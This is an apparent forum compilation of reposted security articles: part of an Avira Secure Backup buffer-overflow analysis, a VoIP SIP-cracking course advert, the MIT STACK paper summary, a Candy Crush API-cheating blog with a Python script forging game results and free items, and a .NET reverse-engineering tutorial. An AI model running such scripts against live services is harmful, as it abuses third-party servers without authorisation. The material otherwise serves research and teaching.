; | 0043F0FD |. FFD6 CALL ESI The first part queries the base key „HKEY_CURRENT_USER\Software\Avira Secure Backup“ using a CALL ESI (0x0043F0FD), which holds the function RegOpenKeyExW, that has been moved into ESI at 0x0043F0DA. The function arguments for the RegOpenKeyExW can be found on the stack: The second part queries the final values: 0043F0FF |. 8B3D 10704E00 MOV EDI,DWORD PTR DS:[<&ADVAPI32.RegQuer>; ADVAPI32.RegQueryValueExW 0043F105 |. 85C0 TEST EAX,EAX 0043F107 |. 75 2A JNZ SHORT Avira_Se.0043F133 0043F109 |. 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C] 0043F10C |. 50 PUSH EAX ; /pBufSize 0043F10D |. FF75 14 PUSH DWORD PTR SS:[EBP+14] ; |Buffer 0043F110 |. 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10] ; | 0043F113 |. 50 PUSH EAX ; |pValueType 0043F114 |. 53 PUSH EBX ; |Reserved => NULL 0043F115 |. FF75 10 PUSH DWORD PTR SS:[EBP+10] ; |ValueName 0043F118 |. FF75 F8 PUSH DWORD PTR SS:[EBP-8] ; |hKey 0043F11B |. FFD7 CALL EDI ; \RegQueryValueExW The function RegQueryValueExW is moved into EDI (0x0043F0FF) and later called (0x0043F11B) with the ValueName (first: “AutoUpdateProgressFilename” and in a second run “AutoUpdateDownloadFilename”) of the vulnerable key. The function arguments for the RegQueryValueExW call on the stack are: Let’s have a look at a basic RegQueryValueExW function call and its arguments (http://msdn.microsoft.com/en-us/library/windows/desktop/ms724911(v=vs.85).aspx) LONG WINAPI RegQueryValueEx( _In_ HKEY hKey, _In_opt_ LPCTSTR lpValueName, _Reserved_ LPDWORD lpReserved, _Out_opt_ LPDWORD lpType, _Out_opt_ LPBYTE lpData, _Inout_opt_ LPDWORD lpcbData ); Articol complet: https://www.rcesecurity.com/2013/11/cve-2013-6356-avira-secure-backup-v1-0-0-1-buffer-overflow-anatomy-of-a-vulnerability/

[h=2]How To Crack SIP Authentication & Listen To VoIP Calls[/h][h=3]With Expert mile2 Instructor: Eric Deshetler[/h] [h=4]Hosted by Max Dalziel (Concise Courses CEO)[/h] [h=3]Learning Objectives and VoIP Skills![/h] Confidently exploit or prevent VoIP hacks Demonstrate your Wireshark expertise (and teach your skills to others members of your team) Protect your VoIP networks from malicious hackers Sursa: Learn How To Crack SIP Authentication & Listen To VoIP Calls | Hacking VoIP Skype

[h=1]MIT Researchers Uncover Security Flaws in C and C++ Software[/h] MIT researchers have produced a new paper that uncovers security flaws in C and C++ software, which are generated by compiler optimizations that discard ambiguous code or code, which produces undefined behavior. Some of that code includes security-relevant checks and the paper includes examples of null pointer checks and pointer overflow checks that the GCC compiler optimizes away, leaving the resulting object code exploitable. More complex ambiguous code includes things like bit shift operations that operate one way on x86 and operate another way on different architectures such as ARM. The MIT team produced a new static source code checker named STACK that identifies such code, which they term "undefined behavior" and "unstable code." They researchers identified 32 bugs inside the Linux kernel, five in the Python programming language and nine in the Posgres DBMS. More worryingly, the team ran Stack against the Debian Linux archive, of which 8575 out of 17432 packages contained C/C++ code. For a whopping 3471 packages, STACK detected at least one instance of unstable code. The research paper can be found at: http://pdos.csail.mit.edu/~xi/papers/stack-sosp13.pdf

Winning at Candy Crush I find Flash games on Facebook great fun. Not playing them, of course, that’s boring. As you may remember from my previous post, “winning at Puzzle Adventures“, I like to take a look into their guts and figure out how they work, and whether or not I can get insane scores with no effort. When I discovered Candy Crush Saga, I was intrigued. All my friends appeared mad about this game, sending me so many requests for candy that their dentist would surely commit harakiri. I started playing a bit, and it wasn’t long until I had to stop playing, since the game only allows you a set number of lives per hour in an attempt to either extract money from you or coax you into spamming your friends with requests for the game, to increase its popularity. Cheating at online games This, however, wouldn’t do, so I fired up the Swiss army knife of web debugging, Charles Proxy (it’s a fantastic tool for this job). I started looking at the requests the game was making to the server, and saw one that looked promising: http://candycrush.king.com/api/gameInitLight"currentUser": { "lives": 5, "maxLives": 5, } I added a breakpoint and edited lives to always be 5, which did allow me to play for ever, no matter how much I lost. Yay for non-existent server checks! This wasn’t great, though. Sure, I could play as much as I want, but I don’t want to play at all! I wanted to see if I could make the game much easier somehow. Looking some more, I found the call that loads the level, and the level details specify the number of colors to use on the level. Since the game is played by getting candy of one color to line up in a row, fewer colors means a considerably easier game. However, too few colors and the game won’t end at all! I discovered that four colors is the sweet spot, and edited the level accordingly: http://candycrush.king.com/api/gameStart{ "levelData":{ "numberOfColours":4, "gameModeName":"Light up", "pepperCandyMax":1, "pepperCandySpawn":3, "chameleonCandyMax":0 }, } Success! There were only four colors in the level, and the game pretty much cascaded into a huge victory after two or three moves. Diving deeper Even this, though, was very time-consuming. The game has 500 levels, and, with 3 minutes per level, it would take way too long to win every single one. I needed to discover a faster way to “play” games. Helpfully, the server gives you a list of all the API methods when there’s an error: com.king.saga.api.CurrentUserResponse poll(); com.king.saga.api.GetMessagesResponse getMessages(); [Lcom.king.saga.api.ApiItemInfo; unlockItem(java.lang.String, java.lang.String); com.king.saga.api.ApiGameEnd gameEnd(com.king.saga.api.ApiGameResult); com.king.saga.api.GameInit gameInit(); com.king.saga.api.ApiGameStart gameStart(int, int); com.king.saga.api.PeekMessagesResponse peekMessages(); com.king.saga.api.GetMessagesResponse removeMessages([Ljava.lang.Long;, boolean); com.king.saga.api.GameInit gameInitLight(); com.king.saga.api.ApiGameEnd gameEnd2(com.king.saga.api.ApiGameResult); Looking at those and the responses, we can immediately see that the gameEnd method is very interesting indeed: http://candycrush.king.com/api/gameEnd{ "score":373400, "variant":0, "seed":1384024506403, "reason":0, "timeLeftPercent":-1, "cs":"040a6a", "episodeId":34, "levelId":4 } What’s this? It looks like we can just tell the game we finished a level, without any other hassle. I tried to replay that request by changing the score, but nothing happened. Nothing happened if I specified different episode ids, either. There must be some signature we can’t duplicate, and the “cs” field sounds awfully close to “checksum”. I was very close to solving the whole puzzle, but the checksum field means that I will have to fake the signature (which, unless the Candy Crush developers are clueless, should contain a secret key). There’s really no way to figure out how the signature is produced without looking at the source, so that’s what I did. Using my trusty Flash decompiler, I rummaged around in the source code, and found that the cs parameter is basically an MD5 of the following: "episodeId:levelId:score:timeLeftPercent:userId:seed:secretkey" Finding the secret key took a bit more digging, but, with the final piece of the puzzle uncovered, I could finally make make requests to the server and make it seems as if we legitimately finished a game. I’m not sure if you really have to make the gameStarted call, or if you can pass in any random seed you want, but I think the call is optional. At this point, I could pretty much finish any level I want, with any score I want, in about half a second. A script to make it easier However, having to do all this in a shell (or curl) was still too hard. To remove that final obstacle, i wrote a small CCrush Python class with various methods to make automatically winning in the game easier. Here’s the listing: import requestsimport hashlib import json import random import time import sys class CCrush(object): def __init__(self, session): self.session = session def hand_out_winnings(self, item_type, amount): item = [{"type": item_type, "amount": amount}] params = { "_session": self.session, "arg0": json.dumps(item), "arg1": 1, "arg2": 1, "arg3": "hash", } return requests.get("http://candycrush.king.com/api/handOutItemWinnings", params=params) def add_life(self): params = {"_session": self.session} return requests.get("http://candycrush.king.com/api/addLife", params=params) def start_game(self, episode, level): params = {"_session": self.session, "arg0": episode, "arg1": level} response = requests.get("http://candycrush.king.com/api/gameStart", params=params) return response.json()["seed"] def end_game(self, episode, level, seed, score=None): if score is None: score = random.randrange(3000, 6000) * 100 dic = { "timeLeftPercent": -1, "episodeId": episode, "levelId": level, "score": score, "variant": 0, "seed": seed, "reason": 0, } dic["cs"] = hashlib.md5("%(episodeId)s:%(levelId)s:%(score)s:%(timeLeftPercent)s:userid:%(seed)s:thesecret" % dic).hexdigest()[:6] params = {"_session": self.session, "arg0": json.dumps(dic)} response = requests.get("http://candycrush.king.com/api/gameEnd", params=params) return response def play_game(self, episode, level, score=None): seed = self.start_game(episode, level) return self.end_game(episode, level, seed, score) if __name__ == "__main__": ccrush = CCrush(sys.argv[1]) episode = int(sys.argv[2]) level = int(sys.argv[3]) seed = ccrush.start_game(episode, level) ccrush.end_game(episode, level, seed) This script can be invoked with python ccrush.py <sessionid> <episode> <level>, and it will automatically pass that level with a random score. Here’s the result: The script doesn’t actually work without the secret key, but that’s left as an exercise for the reader. It does work for getting extra lives for free, or extra helper items/gold, though. My aim with this post is less about telling people how to cheat in the game and more about the thought process behind analyzing these things. NOTE: After the amazing response to this post, I feel like I need to clarify something: It’s not a bug, or a fault on the part of the developers of Candy Crush that this is possible. Spending time and effort implementing anti-cheat measures would just be wasted, since it brings them no benefit (the most cheaters can do is brag to their friends, and they most probably weren’t going to pay anyway). So, I’m not implying that King should fix this, or that they don’t know what they’re doing. If I were developing Candy Crush, I wouldn’t put in any anti-cheating code either (as I said above, it would bring no benefit). I hope you enjoyed this short exploration of game APIs, and got a bit more knowledge in the process. For more posts like this, you can read my “winning” series, subscribe to my mailing list below to be notified of new posts, or follow me on Twitter. Sursa: Winning at Candy Crush - Stavros' Stuff

[h=3]Reverse Engineering InternalCall Methods in .NET[/h] Often times, when attempting to reverse engineer a particular .NET method, I will hit a wall because I’ll dig in far enough into the method’s implementation that I’ll reach a private method marked [MethodImpl(MethodImplOptions.InternalCall)]. For example, I was interested in seeing how the .NET framework loads PE files in memory via a byte array using the System.Reflection.Assembly.Load(Byte[]) method. When viewed in ILSpy (my favorite .NET decompiler), it will show the following implementation: So the first thing it does is check to see if you’re allowed to load a PE image in the first place via the CheckLoadByteArraySupported method. Basically, if the executing assembly is a tile app, then you will not be allowed to load a PE file as a byte array. It then calls the RuntimeAssembly.nLoadImage method. If you click on this method in ILSpy, you will be disappointed to find that there does not appear to be a managed implementation. As you can see, all you get is a method signature and an InternalCall property. To begin to understand how we might be able reverse engineer this method, we need to know the definition of InternalCall. According to MSDN documentation, InternalCall refers to a method call that “is internal, that is, it calls a method that is implemented within the common language runtime.” So it would seem likely that this method is implemented as a native function in clr.dll. To validate my assumption, let’s use Windbg with sos.dll – the managed code debugger extension. My goal using Windbg will be to determine the native pointer for the nLoadImage method and see if it jumps to its respective native function in clr.dll. I will attach Windbg to PowerShell since PowerShell will make it easy to get the information needed by the SOS debugger extension. The first thing I need to do is get the metadata token for the nLoadImage method. This will be used in Windbg to resolve the method. As you can see, the Get-ILDisassembly function in PowerSploit conveniently provides the metadata token for the nLoadImage method. Now on to Windbg for further analysis… The following commands were executed: 1) .loadby sos clr Load the SOS debugging extension from the directory that clr.dll is loaded from 2) !Token2EE mscorlib.dll 0x0600278C Retrieves the MethodDesc of the nLoadImage method. The first argument (mscorlib.dll) is the module that implements the nLoadImage method and the hex number is the metadata token retrieved from PowerShell. 3) !DumpMD 0x634381b0 I then dump information about the MethodDesc. This will give the address of the method table for the object that implements nLoadImage 4) !DumpMT -MD 0x636e42fc This will dump all of the methods for the System.Reflection.RuntimeAssembly class with their respective native entry point. nLoadImage has the following entry: 635910a0 634381b0 NONE System.Reflection.RuntimeAssembly.nLoadImage(Byte[], Byte[], System.Security.Policy.Evidence, System.Threading.StackCrawlMark ByRef, Boolean, System.Security.SecurityContextSource) So the native address for nLoadImage is 0x635910a0. Now, set a breakpoint on that address, let the program continue execution and use PowerShell to call the Load method on a bogus PE byte array. PS C:\> [Reflection.Assembly]::Load(([byte[]]@(1,2,3))) You’ll then hit your breakpoint in WIndbg and if you disassemble from where you landed, the function that implements the nLoadImage method will be crystal clear – clr!AssemblyNative::LoadImage You can now use IDA for further analysis and begin digging into the actual implementation of this InternalCall method! After digging into some of the InternalCall methods in IDA you’ll quickly see that most functions use the fastcall convention. In x86, this means that a static function will pass its first two arguments via ECX and EDX. If it’s an instance function, the ‘this’ pointer will be passed via ECX (as is standard in thiscall) and its first argument via EDX. Any remaining arguments are pushed onto the stack. So for the handful of people that have wondered where the implementation for an InternalCall method lies, I hope this post has been helpful. Sursa: Exploit Monday: Reverse Engineering InternalCall Methods in .NET